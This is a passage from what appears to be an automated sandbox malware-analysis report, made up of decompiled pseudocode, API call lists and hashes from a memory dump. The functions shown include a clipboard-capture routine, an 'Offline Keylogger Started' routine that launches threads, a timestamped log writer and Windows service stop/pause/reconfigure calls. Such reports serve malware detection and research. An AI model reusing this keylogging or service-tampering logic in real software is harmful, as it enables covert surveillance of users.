                0x00419803
                0x00419804
                0x00419804
                0x00419853
                0x00419860

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418EE9,00000000), ref: 004197E3
                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418EE9,00000000), ref: 004197F7
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 00419804
                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418EE9,00000000), ref: 00419839
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 0041984B
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 0041984E
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                • String ID:
                • API String ID: 493672254-0
                • Opcode ID: 0685ee7683545c8fe4094fdd631725e3e0c03e6f2c1836bfabfed0fff3afeb22
                • Instruction ID: a47b9f36788e1574db55dd564176aee803a97132f2343e107bd38cafad37238b
                • Opcode Fuzzy Hash: 0685ee7683545c8fe4094fdd631725e3e0c03e6f2c1836bfabfed0fff3afeb22
                • Instruction Fuzzy Hash: 280149311592147AD6146B34AC6EEBB3B9CDB03770F10033BF525921D2DA68CD45C1E9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00446A95 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 75%
                			E00446A95(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x46f1dc; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E004443F4(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00447092(_t25, _t36, __eflags,  *0x46f1dc, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00446907(_t25, _t31, 0x470664);
							E00445002(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00445002();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E004449F5(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x46f1dc; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E004443F4(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00447092(_t27, _t37, __eflags,  *0x46f1dc, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00446907(_t27, _t32, 0x470664);
									E00445002(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00445002();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0044703C(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0044703C(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                0x00446a95
                0x00446a95
                0x00446a95
                0x00446a9f
                0x00446aa1
                0x00446aa6
                0x00446aa9
                0x00446ab7
                0x00446abe
                0x00446ac3
                0x00446ac6
                0x00446ac9
                0x00446adb
                0x00446ae0
                0x00446ae2
                0x00446aed
                0x00446af4
                0x00446af9
                0x00446afc
                0x00446afe
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00446ae4
                0x00446ae4
                0x00000000
                0x00446ae4
                0x00446acb
                0x00446acb
                0x00446acc
                0x00446acc
                0x00446ad1
                0x00446b0c
                0x00446b0d
                0x00446b13
                0x00446b18
                0x00446b1b
                0x00446b1c
                0x00446b1d
                0x00446b24
                0x00446b26
                0x00446b28
                0x00446b2d
                0x00446b30
                0x00446b3e
                0x00446b4a
                0x00446b4d
                0x00446b50
                0x00446b62
                0x00446b67
                0x00446b69
                0x00446b74
                0x00446b7a
                0x00446b82
                0x00446b84
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00446b6b
                0x00446b6b
                0x00000000
                0x00446b6b
                0x00446b52
                0x00446b52
                0x00446b53
                0x00446b53
                0x00446b86
                0x00446b87
                0x00446b87
                0x00446b32
                0x00446b38
                0x00446b3c
                0x00446b8f
                0x00446b90
                0x00446b96
                0x00000000
                0x00000000
                0x00000000
                0x00446b3c
                0x00446b9d
                0x00446b9d
                0x00446aab
                0x00446ab1
                0x00446ab5
                0x00446b00
                0x00446b01
                0x00446b0b
                0x00000000
                0x00000000
                0x00000000
                0x00446ab5

                APIs
                • GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                • _free.LIBCMT ref: 00446ACC
                • _free.LIBCMT ref: 00446AF4
                • SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                • SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                • _abort.LIBCMT ref: 00446B13
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 806b9488dbb5f67dc4a24e364a824df2f5f943de60d9707ff7ce2e9c29f9cb7b
                • Instruction ID: 6a8f3ccd0764d1e9e7d83ebdae3328841d1b307594cb58bb8d86c94d160514c2
                • Opcode Fuzzy Hash: 806b9488dbb5f67dc4a24e364a824df2f5f943de60d9707ff7ce2e9c29f9cb7b
                • Instruction Fuzzy Hash: 9FF0D675105B0166F612B325BC06E6B2A558BD3B69F22403BF904E22D2EF6DC806816E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00419601 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00419601(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x20);
				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x20);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EE9();
				return _t16;
			}







                0x0041960c
                0x0041961b
                0x0041962a
                0x0041962e
                0x0041964f
                0x00419652
                0x00419655
                0x00419630
                0x00419631
                0x00419631
                0x0041965a
                0x00419667

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041917E,00000000), ref: 00419610
                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041917E,00000000), ref: 00419624
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419631
                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041917E,00000000), ref: 00419640
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419652
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419655
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ControlManager
                • String ID:
                • API String ID: 221034970-0
                • Opcode ID: e6db69cc8be19a6ae9fe5f77aceb0022ff7f1936e362e083b92f1549f5c30de9
                • Instruction ID: a7ca8c43b745447570174616d627e1def875c64aa7390fdce4b26778a5b79433
                • Opcode Fuzzy Hash: e6db69cc8be19a6ae9fe5f77aceb0022ff7f1936e362e083b92f1549f5c30de9
                • Instruction Fuzzy Hash: 4EF0C2315003186BD210AF65AC89DBF3BECDB45BA1F00007AFD09921D2DA28CD4685F9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041976C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0041976C(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EE9();
				return _t16;
			}







                0x00419777
                0x00419786
                0x00419795
                0x00419799
                0x004197ba
                0x004197bd
                0x004197c0
                0x0041979b
                0x0041979c
                0x0041979c
                0x004197c5
                0x004197d2

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041907E,00000000), ref: 0041977B
                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041907E,00000000), ref: 0041978F
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 0041979C
                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041907E,00000000), ref: 004197AB
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 004197BD
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 004197C0
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ControlManager
                • String ID:
                • API String ID: 221034970-0
                • Opcode ID: 8c691c4db612222e8f4a2364d94c776417239c4669202b2951e8d2bba5e27784
                • Instruction ID: a5790d775f0640958528a35b07e9f071147c503c7fab8b2ef1513a048adfe726
                • Opcode Fuzzy Hash: 8c691c4db612222e8f4a2364d94c776417239c4669202b2951e8d2bba5e27784
                • Instruction Fuzzy Hash: 62F0C271501218ABD210AF65EC89DBF3BECDF45BA5B00007AFE09921D2DA38CD4685E9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00419705 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00419705(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EE9();
				return _t16;
			}







                0x00419710
                0x0041971f
                0x0041972e
                0x00419732
                0x00419753
                0x00419756
                0x00419759
                0x00419734
                0x00419735
                0x00419735
                0x0041975e
                0x0041976b

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004190FE,00000000), ref: 00419714
                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004190FE,00000000), ref: 00419728
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419735
                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,004190FE,00000000), ref: 00419744
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419756
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419759
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ControlManager
                • String ID:
                • API String ID: 221034970-0
                • Opcode ID: f72edf81a8943e434c500194a05c696fe4de80c9056decf97eeda48cf3bd3e0d
                • Instruction ID: 8fc70a690c960e854b45078eaab18319365206aebec4e159bed8ee303a354907
                • Opcode Fuzzy Hash: f72edf81a8943e434c500194a05c696fe4de80c9056decf97eeda48cf3bd3e0d
                • Instruction Fuzzy Hash: 74F0C2715002186BD210AF65AC89DBF3BECDF45BA1F40007AFE09A61D2DB38CD4585E9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404CA3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00404CA3(void* __ecx, void* __edx, _Unknown_base(*)()* _a4, signed int _a12) {
				char _v24;
				char _v28;
				char _v40;
				void* _v44;
				char _v48;
				signed int _v52;
				void* _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v76;
				char _v80;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t61;
				void* _t65;
				struct _SECURITY_ATTRIBUTES* _t67;
				signed int _t73;
				void* _t90;
				_Unknown_base(*)()* _t92;
				void* _t94;
				void* _t96;
				void* _t97;
				void* _t98;

				_t90 = __edx;
				_t97 =  &_v56;
				_v52 = _v52 & 0x00000000;
				_t94 = __ecx;
				 *(__ecx + 0x54) =  *(__ecx + 0x54) & 0x00000000;
				E004020BF(_t65,  &_v48);
				_t7 = _t94 + 0x58; // 0x472f38
				_t35 = _t7;
				_t92 = _a4;
				while(E00404EDB(_t94, E00401F8B(_t92),  &_v52, _t35) != 0) {
					_t73 =  *(_t94 + 0x30) & 0x000000ff;
					_a12 = _t73;
					_t96 = _v52 + _t73;
					if(_t96 <= E0040245C()) {
						_t67 = 0;
						__eflags = 0;
					} else {
						_t67 = 1;
						 *((intOrPtr*)(_t94 + 0x54)) = _t96 - E0040245C();
					}
					if(_t67 == 0) {
						E00401FC2( &_v60, _t90, _t94, E00404182(_t92,  &_v24, _a12, 0xffffffff));
						E00401FB8();
						E00401FC2( &_v76, _t90, _t94, E00404182( &_v64,  &_v40, 0, _v68));
						E00401FB8();
						_t103 = _t67;
						if(_t67 != 0) {
							_t25 = _t94 + 0xc; // 0x472eec
							E00401FA0(_t25,  &_v80);
							 *(_t94 + 0x24) = CreateEventA(0, 0, 0, 0);
							__eflags = 0;
							CreateThread(0, 0, _a4, _t94, 0, 0);
							WaitForSingleObject( *(_t94 + 0x24), 0xffffffff);
							CloseHandle( *(_t94 + 0x24));
						} else {
							_t98 = _t97 - 0x18;
							E004020D6(_t67, _t98, _t90, _t103,  &_v80);
							_a4(_t94);
							_t97 = _t98 + 0x1c;
						}
						E00401FC2(_t92, _t90, _t94, E00404182(_t92,  &_v28, _t96, 0xffffffff));
						E00401FB8();
						_t61 = E0040245C();
						_t32 = _t94 + 0x58; // 0x472f38
						_t35 = _t32;
						if(_t61 != 0) {
							continue;
						}
					}
					break;
				}
				return E00401FB8();
			}





























                0x00404ca3
                0x00404ca3
                0x00404ca6
                0x00404cae
                0x00404cb5
                0x00404cb9
                0x00404cc2
                0x00404cc2
                0x00404cc5
                0x00404cc9
                0x00404ce6
                0x00404cee
                0x00404cf2
                0x00404cfd
                0x00404d11
                0x00404d11
                0x00404cff
                0x00404d01
                0x00404d0c
                0x00404d0c
                0x00404d15
                0x00404d32
                0x00404d3b
                0x00404d59
                0x00404d62
                0x00404d6b
                0x00404d6d
                0x00404d85
                0x00404d88
                0x00404d99
                0x00404d9c
                0x00404da7
                0x00404db2
                0x00404dbb
                0x00404d6f
                0x00404d6f
                0x00404d75
                0x00404d7b
                0x00404d7f
                0x00404d7f
                0x00404dd3
                0x00404ddc
                0x00404de3
                0x00404dea
                0x00404dea
                0x00404ded
                0x00000000
                0x00000000
                0x00404ded
                0x00000000
                0x00404d15
                0x00404e03

                APIs
                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00472F38), ref: 00404D93
                • CreateThread.KERNEL32 ref: 00404DA7
                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                • String ID: Cqt
                • API String ID: 3360349984-953143165
                • Opcode ID: 8d6fd5db70c64a241ae51ab836ad73aa377c045dbe9deaa06f84a4a2af7550f9
                • Instruction ID: dba95858f974454461b1e2e40e9edd510e178e98119d07c53f81cbb5064a2bb1
                • Opcode Fuzzy Hash: 8d6fd5db70c64a241ae51ab836ad73aa377c045dbe9deaa06f84a4a2af7550f9
                • Instruction Fuzzy Hash: 524194712083016BC711FB61DD55D6FB7EDAFD4314F400A3EB982A22E2DB3899098666
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040ACBE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E0040ACBE(void* __ecx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t23;
				void* _t27;
				void* _t30;
				void* _t78;
				void* _t84;
				void* _t85;
				void* _t86;

				_t86 = _t85 - 0x94;
				_t78 = __ecx;
				if( *0x474c4c >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E00432CF1(0x474c4c);
					_t89 =  *0x474c4c - 0xffffffff;
					if( *0x474c4c == 0xffffffff) {
						E00401F66(0x474c50, 0x474c50);
						E0043307B(_t89, E004568E0);
						E00432CB2(0x474c4c, 0x474c4c);
					}
				}
				E0040AC84( &_v28);
				_t23 = E0040AF46(0x474c50);
				_t90 = _t23;
				if(_t23 == 0) {
					E0040AE66(0x474c50,  &_v28);
					_t27 = E00406E2B(_t90);
					_t91 = _t27;
					if(_t27 != 0) {
						E00402073(0x474c50,  &_v76, 0x46a8f0, _t84, "\r\n[End of clipboard]\r\n");
						E00402073(0x474c50,  &_v52, 0x46a8f0, _t84, "\r\n[Text copied to clipboard]\r\n");
						_t30 = E0041A7B9( &_v148,  &_v76);
						E00402F85(_t86 - 0x18, E004042FD(0x474c50,  &_v100, E0041A7B9( &_v124,  &_v52), _t84, _t91, 0x474c50), _t30);
						E00409BA9(_t78);
						E00401EE9();
						E00401EE9();
						E00401EE9();
						E00401FB8();
						E00401FB8();
					}
				}
				return E00401EE9();
			}



















                0x0040acc7
                0x0040acdc
                0x0040ace4
                0x0040acec
                0x0040acf1
                0x0040acf9
                0x0040acfd
                0x0040ad07
                0x0040ad0d
                0x0040ad13
                0x0040acf9
                0x0040ad18
                0x0040ad22
                0x0040ad27
                0x0040ad29
                0x0040ad35
                0x0040ad42
                0x0040ad47
                0x0040ad49
                0x0040ad57
                0x0040ad64
                0x0040ad72
                0x0040ad98
                0x0040ada0
                0x0040ada8
                0x0040adb0
                0x0040adbb
                0x0040adc3
                0x0040adcb
                0x0040adcb
                0x0040ad49
                0x0040adde

                APIs
                  • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                • __Init_thread_footer.LIBCMT ref: 0040AD0D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Init_thread_footer__onexit
                • String ID: [End of clipboard]$[Text copied to clipboard]$LLG$PLG
                • API String ID: 1881088180-1960277357
                • Opcode ID: 6ed8eb49d3fa1ddc00cddfd991b7cd95876bcc44e0819f1619be2c8cf3895d0d
                • Instruction ID: 8d56320deb120d659c296c02e5f33f036aa5d094007c574b007f3df0111b0a83
                • Opcode Fuzzy Hash: 6ed8eb49d3fa1ddc00cddfd991b7cd95876bcc44e0819f1619be2c8cf3895d0d
                • Instruction Fuzzy Hash: 8121A2319102054BCB14FBA6D9829EDB379AF84308F10007FE505731D2EF3C5E4A8A9D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040977E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70threadCOMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E0040977E(void* __ecx, char* __edx, char _a4) {
				char _v28;
				char _v32;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t21;
				void* _t39;
				void* _t41;
				signed int _t42;
				void* _t44;

				_t33 = __edx;
				_t44 = (_t42 & 0xfffffff8) - 0x1c;
				_push(_t21);
				_t39 = __ecx;
				 *((char*)(__ecx + 0x49)) = 1;
				E0040AE66(__ecx + 0x60,  &_a4);
				_t48 =  *0x46f9d4 - 0x32;
				_t35 = "Offline Keylogger Started";
				if( *0x46f9d4 != 0x32) {
					E00402073(_t21,  &_v28, __edx, _t41, "Offline Keylogger Started");
					_t44 = _t44 - 0x18;
					_t33 =  &_v32;
					E0041A7B9(_t44,  &_v32);
					E0040A6DA(_t21, _t39, _t48);
					E00401FB8();
				}
				_t45 = _t44 - 0x18;
				E00402073(_t21, _t44 - 0x18, _t33, _t41, _t35);
				E00402073(_t21, _t45 - 0x18, _t33, _t41, "i");
				E0041A04A(_t21, _t35);
				CreateThread(0, 0, E00409880, _t39, 0, 0);
				if( *_t39 == 0) {
					CreateThread(0, 0, E0040986A, _t39, 0, 0);
				}
				CreateThread(0, 0, E0040988C, _t39, 0, 0);
				return E00401EE9();
			}














                0x0040977e
                0x00409784
                0x0040978a
                0x0040978c
                0x00409793
                0x00409797
                0x0040979c
                0x004097a3
                0x004097a8
                0x004097af
                0x004097b4
                0x004097b7
                0x004097bd
                0x004097c4
                0x004097cd
                0x004097cd
                0x004097d2
                0x004097d8
                0x004097e7
                0x004097ec
                0x00409806
                0x0040980a
                0x00409816
                0x00409816
                0x00409822
                0x00409832

                APIs
                • CreateThread.KERNEL32 ref: 00409806
                • CreateThread.KERNEL32 ref: 00409816
                • CreateThread.KERNEL32 ref: 00409822
                  • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                  • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread$LocalTimewsprintf
                • String ID: Offline Keylogger Started$Cqt
                • API String ID: 465354869-147018579
                • Opcode ID: 903f3273002da4c7dfb9f07f49a9c8e8e5ab117bf22a91f6b3e07eaca02fd2e4
                • Instruction ID: de04d47bbc5f4bbdcfa168c24a1029e81d3d9c9d0fe0406f7b4d0e9c742a0715
                • Opcode Fuzzy Hash: 903f3273002da4c7dfb9f07f49a9c8e8e5ab117bf22a91f6b3e07eaca02fd2e4
                • Instruction Fuzzy Hash: CC1198A25003087AD214BB769C86DBB7A5CDA82398B40457FF845222C3DA785E19C6FE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040A6DA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E0040A6DA(void* __ebx, void* __ecx, void* __eflags, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __edi;
				void* __esi;
				void* __ebp;
				WCHAR* _t28;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t66;

				_t66 = __eflags;
				_t61 = __ecx;
				GetLocalTime( &_v20);
				E00401EF3( &_a4, _t21, _t62, E00402FF4(__ebx,  &_v44, E0040AEF6( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t64,  &_a4), _t61, _t64, _t66, L"]\r\n"));
				E00401EE9();
				E00401EE9();
				_push(0x64 + E0040245C() * 2);
				_t28 = E0043A620( &_a4);
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wDay & 0x0000ffff);
				_push(_v20.wMonth & 0x0000ffff);
				wsprintfW(_t28, E00401EE4( &_a4));
				E0040415E(__ebx, _t65, _t21, _t64, _t28);
				E00409BA9(_t61, _v20.wYear & 0x0000ffff);
				L0043A61B(_t28);
				return E00401EE9();
			}















                0x0040a6da
                0x0040a6e5
                0x0040a6e8
                0x0040a714
                0x0040a71c
                0x0040a724
                0x0040a738
                0x0040a739
                0x0040a749
                0x0040a74e
                0x0040a753
                0x0040a758
                0x0040a75d
                0x0040a769
                0x0040a774
                0x0040a77b
                0x0040a781
                0x0040a794

                APIs
                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                • wsprintfW.USER32 ref: 0040A769
                  • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: EventLocalTimewsprintf
                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                • API String ID: 1497725170-248792730
                • Opcode ID: 654991a9fd8647edca9edf08d2cdd9e4fcc91d62cb7c35fa0fe547339d1e4ec5
                • Instruction ID: 67f2dfcb9da7a84066df1aeb29efb07d6386f75bf98186ef1d39347a66652dd1
                • Opcode Fuzzy Hash: 654991a9fd8647edca9edf08d2cdd9e4fcc91d62cb7c35fa0fe547339d1e4ec5
                • Instruction Fuzzy Hash: 44114272404118AACB18FB96EC968FF77B8EE48315B00012FF842661D1EF7C5A45D6AD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041BE1A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E0041BE1A() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				void* __edi;
				struct HWND__* _t20;
				void* _t23;

				E00435760(_t23,  &(_v68.style), 0, 0x2c);
				_v68.cbSize = 0x30;
				_v68.style = 0;
				_v68.lpfnWndProc = E0041BE9A;
				_v68.cbClsExtra = 0;
				asm("movsd");
				_v68.lpszClassName =  &_v20;
				_v68.cbWndExtra = 0;
				asm("movsd");
				_v68.lpszMenuName = 0;
				asm("movsd");
				asm("movsw");
				asm("movsb");
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t20 == 0) {
					GetLastError();
					goto L3;
				}
				return _t20;
			}








                0x0041be2c
                0x0041be36
                0x0041be40
                0x0041be46
                0x0041be50
                0x0041be53
                0x0041be54
                0x0041be5b
                0x0041be5e
                0x0041be5f
                0x0041be62
                0x0041be63
                0x0041be65
                0x0041be6f
                0x0041be91
                0x00000000
                0x0041be91
                0x0041be81
                0x0041be89
                0x0041be8b
                0x00000000
                0x0041be8b
                0x0041be99

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ClassCreateErrorLastRegisterWindow
                • String ID: 0$MsgWindowClass
